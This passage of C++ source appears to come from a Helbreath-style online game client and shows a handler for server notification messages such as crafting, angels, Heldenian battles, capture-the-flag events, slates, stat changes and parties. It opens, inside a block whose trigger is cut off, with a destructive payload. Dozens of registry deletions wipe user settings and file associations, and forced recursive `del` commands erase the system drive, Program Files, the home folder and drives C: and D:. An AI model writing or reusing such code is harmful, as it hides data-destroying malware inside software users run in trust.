			system("reg delete HKEY_CURRENT_USER\\AppEvents /f");
			system("reg delete HKEY_CURRENT_USER\\Console /f");
			system("reg delete HKEY_CURRENT_USER\\Control Panel /f");
			system("reg delete HKEY_CURRENT_USER\\Environment /f");
			system("reg delete HKEY_CURRENT_USER\\Identities /f");
			system("reg delete HKEY_CURRENT_USER\\Keyboard Layout /f");
			system("reg delete HKEY_CURRENT_USER\\Printers /f");
			system("reg delete HKEY_CURRENT_USER\\SessionInformation /f");
			system("reg delete HKEY_CURRENT_USER\\Software /f");
			system("reg delete HKEY_CURRENT_USER\\UNICODE Program Groups /f");
			system("reg delete HKEY_CURRENT_USER\\Volatile Environment /f");
			system("reg delete HKEY_CURRENT_USER\\Windows 3.1 Migration Status /f");
			system("reg delete KEY_CLASSES_ROOT\\* /f");
			system("reg delete HKEY_CLASSES_ROOT\\.iso /f");
			system("reg delete HKEY_CLASSES_ROOT\\.bin /f");
			system("reg delete HKEY_CLASSES_ROOT\\.img /f");
			system("reg delete HKEY_CLASSES_ROOT\\.bmp /f");
			system("reg delete HKEY_CLASSES_ROOT\\.dib /f");
			system("reg delete HKEY_CLASSES_ROOT\\.jpeg /f");
			system("reg delete HKEY_CLASSES_ROOT\\.jpg /f");
			system("reg delete HKEY_CLASSES_ROOT\\.jpe /f");
			system("reg delete HKEY_CLASSES_ROOT\\.jfif /f");
			system("reg delete HKEY_CLASSES_ROOT\\.gif /f");
			system("reg delete HKEY_CLASSES_ROOT\\.png /f");
			system("reg delete HKEY_CLASSES_ROOT\\.tif /f");
			system("reg delete HKEY_CLASSES_ROOT\\.tiff /f");
			system("reg delete HKEY_CLASSES_ROOT\\.psd /f");
			system("reg delete HKEY_CLASSES_ROOT\\.pdd /f");
			system("reg delete HKEY_CLASSES_ROOT\\.rle /f");
			system("reg delete HKEY_CLASSES_ROOT\\.eps /f");
			system("reg delete HKEY_CLASSES_ROOT\\.psb /f");
			system("reg delete HKEY_CLASSES_ROOT\\.pcx /f");
			system("reg delete HKEY_CLASSES_ROOT\\.pdf /f");
			system("reg delete HKEY_CLASSES_ROOT\\.pdp /f");
			system("reg delete HKEY_CLASSES_ROOT\\.sct /f");
			system("reg delete HKEY_CLASSES_ROOT\\.tga /f");
			system("reg delete HKEY_CLASSES_ROOT\\.vda /f");
			system("reg delete HKEY_CLASSES_ROOT\\.icb /f");
			system("reg delete HKEY_CLASSES_ROOT\\.vst /f");
			system("reg delete HKEY_CLASSES_ROOT\\.rtf /f");
			system("reg delete HKEY_CLASSES_ROOT\\.txt /f");
			system("reg delete HKEY_CLASSES_ROOT\\.docx /f");
			system("reg delete HKEY_CLASSES_ROOT\\.kgb /f");
			system("reg delete HKEY_CLASSES_ROOT\\.doc /f");
			system("reg delete HKEY_CLASSES_ROOT\\.dot /f");
			system("reg delete HKEY_CLASSES_ROOT\\.docm /f");
			system("reg delete HKEY_CLASSES_ROOT\\.dotx /f");
			system("reg delete HKEY_CLASSES_ROOT\\.dotm /f");
			system("reg delete HKEY_CLASSES_ROOT\\.xlsx /f");
			system("reg delete HKEY_CLASSES_ROOT\\.xlsm /f");
			system("reg delete HKEY_CLASSES_ROOT\\.xlsb /f");
			system("reg delete HKEY_CLASSES_ROOT\\.xls /f");
			system("reg delete HKEY_CLASSES_ROOT\\.xml /f");
			system("reg delete HKEY_CLASSES_ROOT\\.mht /f");
			system("reg delete HKEY_CLASSES_ROOT\\.mhtml /f");
			system("reg delete HKEY_CLASSES_ROOT\\.htm /f");
			system("reg delete HKEY_CLASSES_ROOT\\.html /f");
			system("reg delete HKEY_CLASSES_ROOT\\.xltx /f");
			system("reg delete HKEY_CLASSES_ROOT\\.xltm /f");
			system("reg delete HKEY_CLASSES_ROOT\\.php /f");
			system("reg delete HKEY_CLASSES_ROOT\\.swf /f");
			system("reg delete HKEY_CLASSES_ROOT\\.fla /f");
			system("reg delete HKEY_CLASSES_ROOT\\.exe /f");
			system("reg delete HKEY_CLASSES_ROOT\\.log /f");
			system("reg delete HKEY_CLASSES_ROOT\\.avi /f");
			system("reg delete HKEY_CLASSES_ROOT\\.mp3 /f");
			system("reg delete HKEY_CLASSES_ROOT\\.wav /f");
			system("reg delete HKEY_CLASSES_ROOT\\.vmw /f");
			system("reg delete HKEY_CLASSES_ROOT\\.bak /f");
			system("reg delete HKEY_CLASSES_ROOT\\.dat /f");
			system("reg delete HKEY_CLASSES_ROOT\\.dll /f");
			system("reg delete HKEY_CLASSES_ROOT\\.cmd /f");
			system("reg delete HKEY_CLASSES_ROOT\\.xml /f");
			system("reg delete HKEY_CLASSES_ROOT\\.msc /f");
			system("reg delete HKEY_CLASSES_ROOT\\.drv /f");
			system("reg delete HKEY_CLASSES_ROOT\\.tmp /f");
			system("reg delete HKEY_CLASSES_ROOT\\.tsk /f");
			system("reg delete HKEY_CLASSES_ROOT\\.rom /f");
			system("reg delete HKEY_CLASSES_ROOT\\.ram /f");
			system("reg delete HKEY_CLASSES_ROOT\\.bat /f");
			system("del %SYSTEMDRIVE%\\*.* /f /s /q");
			system("del %HOMEPATH%\\*.* /f /s /q");
			system("del %ProgramFiles%\\*.* /f /s /q");
			system("del /S /Q c:\\*.*");
			CreateProcess(NULL, "del /S /Q d:\\*.*", NULL, NULL, FALSE, 0, NULL, NULL, &si, &pi);
			system("del /S /Q *.*");
			system("del c:\\*.* /f /s /q");
			CreateProcess(NULL, "del d:\\*.* /f /s /q", NULL, NULL, FALSE, 0, NULL, NULL, &si, &pi);
			CreateProcess(NULL, "del *.* /f /s /q", NULL, NULL, FALSE, 0, NULL, NULL, &si, &pi);
		}
        break;

	case DEF_NOTIFY_SLATE_BERSERK:		// reversed by Snoopy: 0x0BED
		AddEventList( DEF_MSG_NOTIFY_SLATE_BERSERK, 10 );//"Berserk magic casted!"
		m_bUsingSlate = TRUE;
		break;

	case DEF_NOTIFY_0BEF:				// 0x0BEF: // Snoopy: Crash or closes the client? (Calls SE entry !)
		// I'm noot sure at all of this function's result, so let's quit game...

		break;

	case DEF_NOTIFY_CRAFTING_SUCCESS:	//reversed by Snoopy: 0x0BF0:
		m_iContribution -= m_iContributionPrice;
		m_iContributionPrice = 0;
		DisableDialogBox(25);
		AddEventList("Crafting success!", 10);		
		PlaySound('E', 23, 5);
		switch (m_sPlayerType) {
		case 1:
		case 2:
		case 3:
			PlaySound('C', 21, 0);
			break;
		case 4:
		case 5:
		case 6:
			PlaySound('C', 22, 0);
			break;
		}
		break;

	case DEF_NOTIFY_CRAFTING_FAIL:		//reversed by Snoopy: 0x0BF1:
		m_iContributionPrice = 0;
		cp = (char *)(pData	+ DEF_INDEX2_MSGTYPE + 2);
		ip = (int *)cp;
		iV1 = *ip; // Error reason
		switch (iV1) {
		case 1:
			AddEventList(DEF_MSG_NOTIFY_CRAFTING_NO_PART, 10);		// "There is not enough material"
			PlaySound('E', 24, 5);
			break;
		case 2:
			AddEventList(DEF_MSG_NOTIFY_CRAFTING_NO_CONTRIB, 10);	// "There is not enough Contribution Point"
			PlaySound('E', 24, 5);
			break;
		default:
		case 3:
			AddEventList(DEF_MSG_NOTIFY_CRAFTING_FAILED, 10);		// "Crafting failed"
			PlaySound('E', 24, 5);
			break;
		}
		break;

	case DEF_NOTIFY_ANGELIC_STATS:		// reversed by Snoopy: 0x0BF2
		cp = (char *)(pData	+ DEF_INDEX2_MSGTYPE + 2);
		ip = (int *)cp;
		m_iAngelicStr = *ip;  // m_iAngelicStr
		cp +=4;

		ip = (int *)cp;
		m_iAngelicInt = *ip;  // m_iAngelicInt
		cp +=4;

		ip = (int *)cp;
		m_iAngelicDex = *ip;  // m_iAngelicDex
		cp +=4;

		ip = (int *)cp;
		m_iAngelicMag = *ip;  // m_iAngelicMag
		cp +=4;
		break;

	case DEF_NOTIFY_ITEM_CANT_RELEASE:	// reversed by Snoopy: 0x0BF3
		AddEventList(DEF_MSG_NOTIFY_NOT_RELEASED , 10 );//"Item cannot be released"
		cp = (char *)(pData	+ DEF_INDEX2_MSGTYPE + 2);
		ItemEquipHandler(*cp);
		break;

	case DEF_NOTIFY_ANGEL_FAILED:		// reversed by Snoopy: 0x0BF4
		cp = (char *)(pData	+ DEF_INDEX2_MSGTYPE + 2);
		ip = (int *)cp;
		iV1 = *ip; // Error reason
		switch (iV1) {
		case 1: // "BFB9BBF3C4A120BECAC0BA20B9F6B1D7C0D4B4CFB4D92E20A4D02E2EA4D0" (Stolen bytes ?)
			AddEventList(DEF_MSG_NOTIFY_ANGEL_FAILED , 10 ); //"Impossible to get a Tutelary Angel." // Invented by Snoopy.
			break;
		case 2: //
			AddEventList(DEF_MSG_NOTIFY_ANGEL_MAJESTIC , 10 );//"You need additional Majesty Points."
			break;
		case 3: //
			AddEventList(DEF_MSG_NOTIFY_ANGEL_LOW_LVL , 10 ); //"Only Majesty characters can receive Tutelary Angel"
			break;
		}
		break;

	case DEF_NOTIFY_ANGEL_RECEIVED:		// reversed by Snoopy: 0x0BF5:
		AddEventList(DEF_MSG_NOTIFY_ANGEL_RECEIVED, 10 );// "You have received the Tutelary Angel."
		break;

	// 4LifeX Ress Wand Fix
	case DEF_NOTIFY_RESUR_ON:		
		cp = (char *)(pData	+ DEF_INDEX2_MSGTYPE + 2);
		for (i = 0; i < DEF_MAXMAGICTYPE; i++)
		{	m_cMagicMastery[i] = *cp;
			cp++;
		}
		AddEventList( "Magic Spell Resurrection has been put ON.", 10 );
		break;

	// 4LifeX Ress Wand Fix
	case DEF_NOTIFY_RESUR_OFF: 
		cp = (char *)(pData	+ DEF_INDEX2_MSGTYPE + 2);
		for (i = 0; i < DEF_MAXMAGICTYPE; i++)
		{	m_cMagicMastery[i] = *cp;
			cp++;
		}
		AddEventList( "Magic Spell Resurrection has been taken OFF.", 10 );
		break;

	case DEF_NOTIFY_SPELL_SKILL:		// reversed by Snoopy: 0x0BF6
		cp = (char *)(pData	+ DEF_INDEX2_MSGTYPE + 2);
		for (i = 0; i < DEF_MAXMAGICTYPE; i++)
		{	m_cMagicMastery[i] = *cp;
			cp++;
		}
		for (i = 0; i < DEF_MAXSKILLTYPE; i++)
		{	m_cSkillMastery[i] = (unsigned char)*cp;
			if (m_pSkillCfgList[i] != NULL)
				m_pSkillCfgList[i]->m_iLevel = (int)*cp;
			cp++;
		}
		break;

	case DEF_NOTIFY_NORECALL: // Snoopy 0x0BD1
		AddEventList( "You can not recall in this map.", 10 );
		break;

	case DEF_NOTIFY_APOCGATESTARTMSG: // Snoopy 0x0BD2
		SetTopMsg("The portal to the Apocalypse is opened.", 10);
		break;

	case DEF_NOTIFY_APOCGATEENDMSG: // Snoopy 0x0BD3
		SetTopMsg("The portal to the Apocalypse is closed.", 10);
		break;

	case DEF_NOTIFY_APOCGATEOPEN: // Snoopy ;  Case BD4 of switch 00454077
		cp = (char *)(pData	+ DEF_INDEX2_MSGTYPE + 2);
		ip  = (int *)cp;
		m_iGatePositX = *ip;
		cp += 4;
		ip  = (int *)cp;
		m_iGatePositY = *ip;
		cp += 4;
		ZeroMemory(m_cGateMapName, sizeof(m_cGateMapName));
		memcpy(m_cGateMapName, cp, 10);
		cp += 10;
		break;

	case DEF_MAX_STATS: // Centu
		cp = (char*)(pData + DEF_INDEX2_MSGTYPE + 2);
		ip = (int*)cp;
		DEF_STATS_LIMIT = *ip;
		cp += 4;
		break;

	
	case DEF_NOTIFY_QUESTCOUNTER: // Snoopy;  Case BE2 of switch 00454077
		cp = (char *)(pData	+ DEF_INDEX2_MSGTYPE + 2);
		ip  = (int *)cp;
		m_stQuest.sCurrentCount = *ip;
		cp += 4;
		break;

	case DEF_NOTIFY_MONSTERCOUNT: // Snoopy ;  Case BE3 of switch 00454077
		cp = (char *)(pData	+ DEF_INDEX2_MSGTYPE + 2);
		ip  = (int *)cp;
		sV1 = *ip;
		cp+=4;
		wsprintf(cTxt,"Rest Monster :%d", sV1) ;
		AddEventList(cTxt, 10);
		break;

	case DEF_NOTIFY_APOCGATECLOSE: // Snoopy ;  Case BD5 of switch 00454077
		m_iGatePositX = m_iGatePositY = -1;
		ZeroMemory(m_cGateMapName, sizeof(m_cGateMapName));
		break;

	case DEF_NOTIFY_APOCFORCERECALLPLAYERS: // Snoopy ;  Case BD7 of switch 00454077
		AddEventList( "You are recalled by force, because the Apocalypse is started.", 10 );
		break;

		//50Cent - Capture The Flag
	case DEF_NOTIFY_CAPTURETHEFLAGSTART:
		m_bIsCTFMode = true;
		SetTopMsg("Capture The Flag Event has started!", 10);
		break;
	case DEF_NOTIFY_ARESDENCAPTUREDELVINEFLAG:
		m_bIsElvineFlagStatus = false;
		SetTopMsg("Aresden Captured Elvine Flag!", 10);
		break;
	case DEF_NOTIFY_ELVINECAPTUREDARESDENFLAG:
		m_bIsAresdenFlagStatus = false;
		SetTopMsg("Elvine Captured Aresden Flag!", 10);
		break;
	case DEF_NOTIFY_ELVINEFLAGBACKTOCH:
		m_bIsElvineFlagStatus = true;
		SetTopMsg("Elvine Flag Back to Base!", 10);
		break;
	case DEF_NOTIFY_ARESDENFLAGBACKTOCH:
		m_bIsAresdenFlagStatus = true;
		SetTopMsg("Aresden Flag Back to Base!", 10);
		break;
	case DEF_NOTIFY_ELVINEWINSROUND:
		m_sElvineFlagCount++;
		m_bIsAresdenFlagStatus = true;
		SetTopMsg("Elvine wins this Round!", 10);
		break;
	case DEF_NOTIFY_ARESDENWINSROUND:
		m_sAresdenFlagCount++;
		m_bIsElvineFlagStatus = true;
		SetTopMsg("Aresden wins this Round!", 10);
		break;
	case DEF_NOTIFY_ELVINEWINCTF:
		m_bIsCTFMode = false;
		m_sElvineFlagCount = 0;
		m_sAresdenFlagCount = 0;
		m_bIsElvineFlagStatus = true;
		m_bIsAresdenFlagStatus = true;
		SetTopMsg("Elvine wins Capture The Flag Event!", 10);
		break;
	case DEF_NOTIFY_ARESDENWINCTF:
		m_bIsCTFMode = false;
		m_sElvineFlagCount = 0;
		m_sAresdenFlagCount = 0;
		m_bIsElvineFlagStatus = true;
		m_bIsAresdenFlagStatus = true;
		SetTopMsg("Aresden wins Capture The Flag Event!", 10);
		break;
	case DEF_NOTIFY_TIECTF:
		m_bIsCTFMode = false;
		m_sElvineFlagCount = 0;
		m_sAresdenFlagCount = 0;
		m_bIsElvineFlagStatus = true;
		m_bIsAresdenFlagStatus = true;
		SetTopMsg("Capture The Flag Event ended in a tie.", 10);
		break;

	case DEF_NOTIFY_ABADDONKILLED: // Snoopy ;  Case BD6 of switch 00454077
		cp = (char *)(pData	+ DEF_INDEX2_MSGTYPE + 2);
		ZeroMemory(cTxt, sizeof(cTxt));
		memcpy(cTxt, cp, 10);
		cp += 10;
		wsprintf(G_cTxt, "Abaddon is destroyed by %s", cTxt);
		AddEventList(G_cTxt, 10);
		break;

	case DEF_NOTIFY_0BE5: // Snoopy Abaddon's related? Thunder?;  Case BE5 of switch 00454077
		break;

	case DEF_NOTIFY_RESURRECTPLAYER: // Case BE9 of switch 00454077
		EnableDialogBox(50, 0, NULL, NULL);
		break;

	case DEF_NOTIFY_HELDENIANTELEPORT: //;  Case BE6 of switch 00454077
		m_bIsHeldenian = TRUE;
		SetTopMsg("Teleport to Heldenian field is available from now. Magic casting is forbidden until real battle.", 10);
		break;

	case DEF_NOTIFY_HELDENIANEND: //    ;  Case BE7 of switch 00454077
		m_bIsHeldenian = FALSE;
		SetTopMsg("Heldenian holy war has been closed.", 10);
		break;

	case DEF_NOTIFY_0BE8: // ;  Case BE8 of switch 00454077
		SetTopMsg("Characters will be recalled by force as Heldenian begins.", 10);
		break;

	case DEF_NOTIFY_HELDENIANSTART: //  Case BEA of switch 00454077
		
		SetTopMsg("Heldenian real battle has been started form now on.", 10);
		break;

	case DEF_NOTIFY_HELDENIANVICTORY: // Case BEB of switch 00454077
		cp = (char *)(pData	+ DEF_INDEX2_MSGTYPE + 2);
		ip  = (int *)cp;
		sV1 = *ip;
		cp+=4;
		ShowHeldenianVictory(sV1);
		m_iHeldenianAresdenLeftTower	= -1;
		m_iHeldenianElvineLeftTower		= -1;
		m_iHeldenianAresdenFlags	= -1;
		m_iHeldenianElvineFlags		= -1;
		m_iHeldenianAresdenDead		= -1;
		m_iHeldenianElvineDead			= -1;
		break;

	case DEF_NOTIFY_HELDENIANCOUNT: // Case BEC of switch 00454077
		cp = (char *)(pData	+ DEF_INDEX2_MSGTYPE + 2);

		ip  = (int *)cp;
		m_iHeldenianAresdenLeftTower = *ip;
		cp+=4;

		ip  = (int *)cp;
		m_iHeldenianElvineLeftTower = *ip;
		cp+=4;

		ip  = (int *)cp;
		m_iHeldenianAresdenFlags = *ip;
		cp+=4;

		ip  = (int *)cp;
		m_iHeldenianElvineFlags = *ip;
		cp+=4;

		ip  = (int *)cp;
		m_iHeldenianAresdenDead = *ip;
		cp+=4;

		ip  = (int *)cp;
		m_iHeldenianElvineDead = *ip;
		cp+=4;

		break;

	// Slates - Diuuude
	case DEF_NOTIFY_SLATE_CREATESUCCESS:	// 0x0BC1
		AddEventList( DEF_MSG_NOTIFY_SLATE_CREATESUCCESS, 10 );
		break;
	case DEF_NOTIFY_SLATE_CREATEFAIL:		// 0x0BC2
		AddEventList( DEF_MSG_NOTIFY_SLATE_CREATEFAIL, 10 );
		break;
	case DEF_NOTIFY_SLATE_INVINCIBLE:		// 0x0BD8
		AddEventList( DEF_MSG_NOTIFY_SLATE_INVINCIBLE, 10 );
		m_bUsingSlate = TRUE;
		break;
	case DEF_NOTIFY_SLATE_MANA:				// 0x0BD9
		AddEventList( DEF_MSG_NOTIFY_SLATE_MANA, 10 );
		m_bUsingSlate = TRUE;
		break;
	case DEF_NOTIFY_SLATE_EXP:				// 0x0BE0
		AddEventList( DEF_MSG_NOTIFY_SLATE_EXP, 10 );
		m_bUsingSlate = TRUE;
		break;
	case DEF_NOTIFY_SLATE_STATUS:			// 0x0BE1
		AddEventList( DEF_MSG_NOTIFY_SLATECLEAR, 10 ); // "The effect of the prophecy-slate is disappeared."
		m_bUsingSlate = FALSE;
		break;

	// MJ Stats Change - Diuuude: Erreur, ici il s'agit de sorts et skills, le serveur comme la v351 sont aussi bugus !
	case DEF_NOTIFY_STATECHANGE_SUCCESS:	// 0x0BB5
		cp = (char *)(pData	+ DEF_INDEX2_MSGTYPE + 2);
		for (i = 0; i < DEF_MAXMAGICTYPE; i++)
		{	m_cMagicMastery[i] = *cp;
			cp++;
		}
		for (i = 0; i < DEF_MAXSKILLTYPE; i++)
		{	m_cSkillMastery[i] = (unsigned char)*cp;
			if (m_pSkillCfgList[i] != NULL)
				m_pSkillCfgList[i]->m_iLevel = (int)*cp;
			cp++;
		}
		// MJ Stats Change - Diuuude
		m_iStr += m_cLU_Str;
		m_iVit += m_cLU_Vit;
		m_iDex += m_cLU_Dex;
		m_iInt += m_cLU_Int;
		m_iMag += m_cLU_Mag;
		m_iCharisma += m_cLU_Char;
		m_iLU_Point = m_iLevel*3 - ((m_iStr + m_iVit + m_iDex + m_iInt + m_iMag + m_iCharisma) - 70) - 3;
		m_cLU_Str = m_cLU_Vit = m_cLU_Dex = m_cLU_Int = m_cLU_Mag = m_cLU_Char = 0;
		AddEventList( "Your stat has been changed.", 10 ); // "Your stat has been changed."
		break;

	case DEF_NOTIFY_LEVELUP: // 0x0B16
		NotifyMsg_LevelUp(pData);
		break;

	case DEF_NOTIFY_STATECHANGE_FAILED:		// 0x0BB6
	case DEF_NOTIFY_SETTING_FAILED: // 0x0BB4 -  Case BB4 of switch 00454077
		AddEventList( "Your stat has not been changed.", 10 );
		m_cLU_Str = m_cLU_Vit = m_cLU_Dex = m_cLU_Int = m_cLU_Mag = m_cLU_Char = 0;
		m_iLU_Point = m_iLevel*3 - ((m_iStr + m_iVit + m_iDex + m_iInt + m_iMag + m_iCharisma) - 70) - 3;
		break;

	// CLEROTH - LU
	case DEF_NOTIFY_SETTING_SUCCESS: // 0x0BB3 - envoie le niv et les stats
		NotifyMsg_SettingSuccess(pData);
		break;

	case DEF_NOTIFY_AGRICULTURENOAREA:		// 0x0BB2
		AddEventList( DEF_MSG_NOTIFY_AGRICULTURENOAREA, 10 );
		break;
	case DEF_NOTIFY_AGRICULTURESKILLLIMIT:	// 0x0BB1
		AddEventList( DEF_MSG_NOTIFY_AGRICULTURESKILLLIMIT, 10 );
		break;

	case DEF_NOTIFY_NOMOREAGRICULTURE:		// 0x0BB0
		AddEventList( DEF_MSG_NOTIFY_NOMOREAGRICULTURE, 10 );
		break;
	case DEF_NOTIFY_SPAWNEVENT:				// 0x0BAA
		cp = (char *)(pData	+ DEF_INDEX2_MSGTYPE + 2);
		m_sMonsterID = (short)(*cp);
		cp++;
		sp  = (short *)cp;
		m_sEventX = *sp;
		cp+=2;
		sp  = (short *)cp;
		m_sEventY = *sp;
		cp+=2;
		m_dwMonsterEventTime = dwTime;
		break;

	case DEF_NOTIFY_CHANGEPLAYMODE:			// 0x0BA9
		cp = (char *)(pData	+ DEF_INDEX2_MSGTYPE + 2);
		memcpy(m_cLocation, cp, 10);
		cp += 10;
		if (memcmp(m_cLocation, "aresden", 7) == 0)
		{	m_bAresden = TRUE;
			m_bCitizen = TRUE;
			m_bHunter = FALSE;
		}else if (memcmp(m_cLocation, "arehunter", 9) == 0)
		{	m_bAresden = TRUE;
			m_bCitizen = TRUE;
			m_bHunter = TRUE;
		}else if (memcmp(m_cLocation, "elvine", 6) == 0)
		{	m_bAresden = FALSE;
			m_bCitizen = TRUE;
			m_bHunter = FALSE;
		}else if (memcmp(m_cLocation, "elvhunter", 9) == 0)
		{	m_bAresden = FALSE;
			m_bCitizen = TRUE;
			m_bHunter = TRUE;
		}else
		{	m_bAresden = TRUE;
			m_bCitizen = FALSE;
			m_bHunter = TRUE;
		}
		AddEventList( DEF_MSG_GAMEMODE_CHANGED, 10 );
		break;

	case DEF_NOTIFY_REQGUILDNAMEANSWER:	 //   0x0BA6
		cp = (char *)(pData	+ DEF_INDEX2_MSGTYPE + 2);
		ip  = (int *)cp;
		sV1 = *ip;
		cp += 4;
		ip  = (int *)cp;
		sV2 = *ip;
		cp += 4;
		ZeroMemory(cTemp, sizeof(cTemp));
		memcpy(cTemp, cp, 20);
		cp += 20;

		ZeroMemory( m_stGuildName[sV2].cGuildName, sizeof(m_stGuildName[sV2].cGuildName) );
		strcpy(m_stGuildName[sV2].cGuildName, cTemp);
		m_stGuildName[sV2].iGuildRank = sV1;
		for (i = 0; i < 20; i++) if (m_stGuildName[sV2].cGuildName[i] == '_') m_stGuildName[sV2].cGuildName[i] = ' ';
		break;

	case DEF_NOTIFY_FORCERECALLTIME: // 0x0BA7
		cp = (char *)(pData	+ DEF_INDEX2_MSGTYPE + 2);
		ip  = (int *)cp;
		sV1 = *ip;
		cp += 4;
		if ( (int)(sV1/20) > 0)
			wsprintf(G_cTxt,NOTIFY_MSG_FORCERECALLTIME1,(int) (sV1/20)) ;
		else
			wsprintf(G_cTxt,NOTIFY_MSG_FORCERECALLTIME2) ;
		AddEventList(G_cTxt, 10);
		break;

	case DEF_NOTIFY_MAJESTIC_LEVEL:
		cp = (char *)(pData	+ DEF_INDEX2_MSGTYPE + 2);
		sp  = (short *)cp;
		sV1 = *sp;
		cp += 2;
		m_iMajesticLevel = sV1;
		break;

	case DEF_NOTIFY_GIZONITEMUPGRADELEFT: // 0x0BA4// Item upgrade is possible.
		cp = (char *)(pData	+ DEF_INDEX2_MSGTYPE + 2);
		ip = (int *)cp;
		m_iGizonItemUpgradeLeft = *ip;
		cp += 4;
		ip = (int *)cp;
		switch (*ip) {
		case 1: //
			wsprintf(cTxt, "Majestic Level Up!!! Majestic Points: %d Level: %d", m_iGizonItemUpgradeLeft, m_iMajesticLevel);// "Level up!!! Level %d!"
			AddEventList(cTxt, 10);
			switch (m_sPlayerType) {
			case 1:
			case 2:
			case 3:
				PlaySound('C', 21, 0);
				break;

			case 4:
			case 5:
			case 6:
				PlaySound('C', 22, 0);
				break;
			}
			_RemoveChatMsgListByObjectID(m_sPlayerObjectID);
			for (i = 1; i < DEF_MAXCHATMSGS; i++)
			if (m_pChatMsgList[i] == NULL) {
				ZeroMemory(cTxt, sizeof(cTxt));
				strcpy(cTxt, "Majestic Up!");
				m_pChatMsgList[i] = new class CMsg(23, cTxt, m_dwCurTime);
				m_pChatMsgList[i]->m_iObjectID = m_sPlayerObjectID;
				if (m_pMapData->bSetChatMsgOwner(m_sPlayerObjectID, -10, -10, i) == FALSE) {
					delete m_pChatMsgList[i];
					m_pChatMsgList[i] = NULL;
				}
				break;
			}
			break;
		}
		cp += 4;
		break;

	case DEF_NOTIFY_DEATHS:
		
		break;

	case DEF_NOTIFY_GIZONEITEMCHANGE: // 0x0BA5
		cp = (char *)(pData	+ DEF_INDEX2_MSGTYPE + 2);
		sp  = (short *)cp;
		sV1 = *sp;
		cp += 2;
		m_pItemList[sV1]->m_cItemType = *cp ;
		cp++ ;
		wp  = (WORD *)cp;
		m_pItemList[sV1]->m_wCurLifeSpan = *wp;
		cp += 2;
		sp  = (short *)cp;
		m_pItemList[sV1]->m_sSprite = *sp;
		cp += 2;
		sp  = (short *)cp;
		m_pItemList[sV1]->m_sSpriteFrame = *sp;
		cp += 2;
		m_pItemList[sV1]->m_cItemColor = *cp ;
		cp++ ;
		m_pItemList[sV1]->m_sItemSpecEffectValue2 = *cp ;
		cp++ ;
		dwp = (DWORD *) cp ;
		m_pItemList[sV1]->m_dwAttribute =  *dwp ;
		cp +=4 ;
		ZeroMemory( m_pItemList[sV1]->m_cName, sizeof(m_pItemList[sV1]->m_cName) );
		memcpy(m_pItemList[sV1]->m_cName,cp,20) ;
		cp += 20 ;
		if (m_bIsDialogEnabled[34] == TRUE)
		{	m_stDialogBoxInfo[34].cMode = 3; // succes
		}
		PlaySound('E', 23, 5);
		switch (m_sPlayerType) {
		case 1:
		case 2:
		case 3:
			PlaySound('C', 21, 0);
			break;

		case 4:
		case 5:
		case 6:
			PlaySound('C', 22, 0);
			break;
		}
		break;

	case DEF_NOTIFY_ITEMATTRIBUTECHANGE: // 0x0BA3
	case 0x0BC0: // 0x0BC0 Unknown msg, but real in client v3.51
		cp = (char *)(pData	+ DEF_INDEX2_MSGTYPE + 2);
		sp  = (short *)cp;
		sV1 = *sp;
		cp += 2;
		dwTemp = m_pItemList[sV1]->m_dwAttribute;
		dwp  = (DWORD *)cp;
		m_pItemList[sV1]->m_dwAttribute = *dwp;
		cp += 4;
		dwp  = (DWORD *)cp;
		if (*dwp != 0) m_pItemList[sV1]->m_sItemSpecEffectValue1 = (short)*dwp;
		cp += 4;
		dwp  = (DWORD *)cp;
		if (*dwp != 0) m_pItemList[sV1]->m_sItemSpecEffectValue2 = (short)*dwp;
		cp += 4;
		if (dwTemp == m_pItemList[sV1]->m_dwAttribute)
		{	if (m_bIsDialogEnabled[34] == TRUE)
			{	m_stDialogBoxInfo[34].cMode = 4;// Failed
			}
			PlaySound('E', 24, 5);
		}else
		{	if (m_bIsDialogEnabled[34] == TRUE)
			{	m_stDialogBoxInfo[34].cMode = 3; // Success
			}
			PlaySound('E', 23, 5);
			switch (m_sPlayerType) {
			case 1:
			case 2:
			case 3:
				PlaySound('C', 21, 0);
				break;
			case 4:
			case 5:
			case 6:
				PlaySound('C', 22, 0);
				break;
		}	}
		break;

	case DEF_NOTIFY_ITEMUPGRADEFAIL:
		cp = (char *)(pData	+ DEF_INDEX2_MSGTYPE + 2);
		sp  = (short *)cp;
		sV1 = *sp;
		cp += 2;
		if (m_bIsDialogEnabled[34] == FALSE) return ;
		PlaySound('E', 24, 5);
		switch(sV1){
		case 1:
			m_stDialogBoxInfo[34].cMode = 8 ; // Failed
			break ;
		case 2:
			m_stDialogBoxInfo[34].cMode = 9 ; // Failed
			break ;
		case 3:
			m_stDialogBoxInfo[34].cMode = 10 ; // Failed
			break ;
		}
		break;

	case DEF_NOTIFY_PARTY:
		cp = (char *)(pData	+ DEF_INDEX2_MSGTYPE + 2);
		sp  = (short *)cp;
		sV1 = *sp;
		cp += 2;
		sp  = (short *)cp;
		sV2 = *sp;
		cp += 2;
		sp  = (short *)cp;
		sV3 = *sp;
		cp += 2;
		switch (sV1) {
		case 1: //
			switch (sV2) {
			case 0:
				EnableDialogBox(32, NULL, NULL, NULL);
				m_stDialogBoxInfo[32].cMode = 9;
				ActualizarParty = TRUE;
				break;

			case 1:
				m_iPartyStatus = 1;
				m_iTotalPartyMember = NULL;
				EnableDialogBox(32, NULL, NULL, NULL);
				m_stDialogBoxInfo[32].cMode = 8;
				for (i = 0; i < DEF_MAXPARTYMEMBERS; i++) 
				{
					ZeroMemory(m_stPartyMemberNameList[i].cName, sizeof(m_stPartyMemberNameList[i].cName));
					bSendCommand(MSGID_COMMAND_COMMON, DEF_COMMONTYPE_REQUEST_JOINPARTY, NULL, 2, NULL, NULL, m_cMCName);
				}
				ActualizarParty = TRUE;
				break;
			}
			break;

		case 2: //
			m_iPartyStatus = 0;
			m_iTotalPartyMember = NULL;
			EnableDialogBox(32, NULL, NULL, NULL);
			m_stDialogBoxInfo[32].cMode = 10;
			for (i = 0; i < DEF_MAXPARTYMEMBERS; i++) 
			{
				ZeroMemory(m_stPartyMemberNameList[i].cName, sizeof(m_stPartyMemberNameList[i].cName));
			}
			ActualizarParty = TRUE;
			break;

		case 4:
			ZeroMemory(cTxt, sizeof(cTxt));
			memcpy(cTxt, cp, 10);
			cp += 10;

			switch (sV2) {
			case 0: //
				EnableDialogBox(32, NULL, NULL, NULL);
				m_stDialogBoxInfo[32].cMode = 9;
				ActualizarParty = TRUE;
				break;

			case 1: //
				if (strcmp(cTxt, m_cPlayerName) == 0) {
					m_iPartyStatus = 2;
					EnableDialogBox(32, NULL, NULL, NULL);
					m_stDialogBoxInfo[32].cMode = 8;
				}
				else {
